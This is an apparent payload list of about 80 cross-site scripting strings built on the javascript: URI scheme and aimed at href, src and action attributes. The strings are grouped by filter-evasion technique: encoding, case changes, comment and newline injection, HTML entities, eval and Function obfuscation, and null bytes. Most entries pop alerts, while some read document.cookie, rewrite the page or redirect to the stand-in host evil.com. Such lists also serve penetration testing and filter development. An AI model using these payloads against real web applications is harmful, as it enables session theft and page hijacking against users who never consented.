# === JAVASCRIPT PROTOCOL PAYLOADS (80+ variations) ===
# Pure for href/src/action attributes

# Basic variations
javascript:alert(1)
javascript:alert('XSS')
javascript:alert("XSS")
javascript:alert(document.domain)
javascript:alert(document.cookie)
javascript:alert(window.origin)
javascript:alert(location)
javascript:prompt(1)
javascript:prompt('XSS')
javascript:confirm(1)
javascript:confirm('XSS')

# Function variations
javascript:void(alert(1))
javascript:void(0);alert(1)
javascript:eval('alert(1)')
javascript:eval(atob('YWxlcnQoMSk='))
javascript:Function('alert(1)')()
javascript:window['alert'](1)
javascript:window['\x61\x6c\x65\x72\x74'](1)
javascript:this['alert'](1)
javascript:self['alert'](1)
javascript:parent['alert'](1)
javascript:top['alert'](1)

# String methods
javascript:alert(String.fromCharCode(88,83,83))
javascript:alert(/XSS/.source)
javascript:alert`1`
javascript:alert\u0028\u0031\u0029
javascript:alert\x28\x31\x29

# Comment bypass
javascript://comment%0aalert(1)
javascript://comment%0dalert(1)
javascript://comment%0a%0dalert(1)
javascript:/*comment*/alert(1)
javascript://%0aalert(1)
javascript://%0dalert(1)
javascript://\nalert(1)
javascript://\ralert(1)

# Encoding variations
javascript:alert%281%29
javascript:alert&#40;1&#41;
javascript:alert&#x28;1&#x29;
javascript:al\u0065rt(1)
javascript:\u0061lert(1)
javascript:\u0061\u006c\u0065\u0072\u0074(1)

# Case variations
Javascript:alert(1)
JAVASCRIPT:alert(1)
JaVaScRiPt:alert(1)
jAvAsCrIpT:alert(1)
JAVAscript:alert(1)
javascrIPT:alert(1)

# Tab/newline injection
javascript%09:alert(1)
javascript%0a:alert(1)
javascript%0d:alert(1)
javascript%09%09:alert(1)

# HTML entity encoding
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(1)

# Expression variations  
javascript:window.onerror=alert;throw%201
javascript:throw%20onerror=alert,'XSS'
javascript:(function(){alert(1)})()
javascript:[].constructor.constructor('alert(1)')()
javascript:constructor.constructor('alert(1)')()

# Document manipulation
javascript:document.write('<h1>XSS</h1>')
javascript:document.body.innerHTML='<h1>XSS</h1>'
javascript:document.body.style.background='red'
javascript:document.location='http://evil.com'
javascript:document.cookie

# Multiple statements
javascript:alert(1);alert(2)
javascript:alert(1),alert(2)
javascript:alert(1)||alert(2)
javascript:alert(1)&&alert(2)
javascript:alert(1)|alert(2)
javascript:alert(1)&alert(2)

# Protocol variations with encoding
java%09script:alert(1)
java%0ascript:alert(1)
java%0dscript:alert(1)
jav%09ascript:alert(1)
jav%0aascript:alert(1)
jav%0dascript:alert(1)
javascript:alert(1)
jav
ascript:alert(1)

# Null byte
java\x00script:alert(1)
javascript\x00:alert(1)

# Advanced obfuscation
javascript:eval('ale'+'rt(1)')
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))
javascript:eval('\x61\x6c\x65\x72\x74\x28\x31\x29')
javascript:eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
javascript:Function('ale'+'rt(1)')()
javascript:new%20Function('alert(1)')()

# Special characters
javascript:alert(1)%0a
javascript:alert(1)%0d
javascript:alert(1)%00
javascript:alert(1)//
javascript:alert(1)#
